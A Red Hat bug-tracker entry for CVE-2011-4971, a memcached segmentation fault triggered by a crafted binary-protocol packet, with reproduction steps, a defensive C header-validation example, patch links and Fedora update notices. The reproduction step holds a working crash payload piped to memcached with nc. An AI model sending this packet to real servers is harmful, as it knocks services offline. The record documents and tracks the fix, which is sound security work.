Bug 957964 - (CVE-2011-4971) CVE-2011-4971 memcached: specially crafted packet segmentation fault
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability
unspecified
All Linux
low Severity low
Assigned To: Red Hat Product Security
impact=low,public=20110515,reported=2...
Keywords: Security
Depends On: 957967 957966 957969 957970 988739
Blocks: 957971
Reported: 2013-04-29 22:07 EDT by Kurt Seifried
Modified: 2015-10-15 13:52 EDT
Doc Type: Bug Fix
External Trackers: Novell 817781 (Priority: None, Status: None, Summary: None, Last Updated: Never)

Description Kurt Seifried 2013-04-29 22:07:56 EDT
This was originally reported by Stefan Bucur:

1. Start memcached in TCP mode. For example:

$ ./memcached -v -p 11211 -U 0

2. Send the specially crafted packet to it: 

$ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211

====

There is a patch mentioned in the original issue report, but the code has 
changed significantly since then.

External References:

https://code.google.com/p/memcached/issues/detail?id=192
http://insecurety.net/?p=872
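
Added example, not part of the original report and not the upstream patch: decoding the 24-byte memcached binary protocol request header at the start of the packet above shows a total body length of 0xffffffe8, which is negative if held in a signed 32-bit int, and a length check that rejects it. The names `check_bin_header` and `signed_value_len` and the 1 MB `MAX_BODY` cap are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define BIN_REQ_MAGIC 0x80
#define BIN_HDR_LEN   24
#define MAX_BODY      (1024u * 1024u) /* assumed cap for this example */

enum verdict { HDR_OK, HDR_SHORT, HDR_BAD_MAGIC, HDR_BODY_TOO_LARGE, HDR_BODY_TOO_SMALL };
struct bin_hdr { uint8_t opcode, extlen; uint16_t keylen; uint32_t bodylen; };

/* First 24 bytes of the packet quoted in the report (trailing bytes are zero). */
static const uint8_t REPORT_HDR[BIN_HDR_LEN] = {
    0x80, 0x12, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xe8 };
/* Constructed well-formed header: 3-byte key, 8 bytes of extras, 5-byte value. */
static const uint8_t GOOD_HDR[BIN_HDR_LEN] = {
    0x80, 0x01, 0x00, 0x03, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10 };

/* Decode the big-endian header fields and reject inconsistent lengths
 * before any of them is used for arithmetic or buffer sizing. */
enum verdict check_bin_header(const uint8_t *p, size_t n, struct bin_hdr *h)
{
    if (n < BIN_HDR_LEN) return HDR_SHORT;
    if (p[0] != BIN_REQ_MAGIC) return HDR_BAD_MAGIC;
    h->opcode  = p[1];
    h->keylen  = (uint16_t)((p[2] << 8) | p[3]);
    h->extlen  = p[4];
    h->bodylen = ((uint32_t)p[8] << 24) | ((uint32_t)p[9] << 16) |
                 ((uint32_t)p[10] << 8) | p[11];
    if (h->bodylen > MAX_BODY) return HDR_BODY_TOO_LARGE;
    if (h->bodylen < (uint32_t)h->keylen + h->extlen) return HDR_BODY_TOO_SMALL;
    return HDR_OK;
}

/* Value length a parser would get if it held bodylen in a signed 32-bit int. */
int32_t signed_value_len(const struct bin_hdr *h)
{
    return (int32_t)h->bodylen - (int32_t)(h->keylen + h->extlen);
}

int main(void)
{
    struct bin_hdr h;
    printf("report header: verdict %d\n", check_bin_header(REPORT_HDR, BIN_HDR_LEN, &h));
    printf("bodylen 0x%08x, signed value length %d\n", (unsigned)h.bodylen, (int)signed_value_len(&h));
    printf("good header: verdict %d\n", check_bin_header(GOOD_HDR, BIN_HDR_LEN, &h));
    return 0;
}
```
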
Comment 1 Kurt Seifried 2013-04-29 22:09:53 EDT
Created memcached tracking bugs for this issue

Affects: fedora-all [bug 957966]
Comment 2 Kurt Seifried 2013-04-29 22:10:27 EDT
Created memcached tracking bugs for this issue

Affects: epel-5 [bug 957967]
Comment 3 Kurt Seifried 2013-04-29 22:12:22 EDT
Created memcached tracking bugs for this issue

Affects: epel-6 [bug 957969]
Comment 6 Huzaifa S. Sidhpurwala 2013-06-18 05:31:39 EDT
Proposed upstream patch (with a test):

https://code.google.com/p/memcached/issues/detail?id=192#c19
Comment 8 Huzaifa S. Sidhpurwala 2013-06-18 05:36:01 EDT
Statement:

This issue affects the version of memcached as shipped with Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this issue as having low security impact; a future update may address this flaw.
Comment 11 Miroslav Lichvar 2013-12-12 08:43:40 EST
It seems upstream has finally accepted the patch and it's in the recently released 1.4.16. Thanks!

https://github.com/memcached/memcached/commit/6695ccbc525c36d693aaa3e8337b36aa0c784424
Comment 12 Fedora Update System 2014-02-02 21:42:28 EST
memcached-1.4.17-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 13 Fedora Update System 2014-02-02 21:49:02 EST
memcached-1.4.17-1.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.
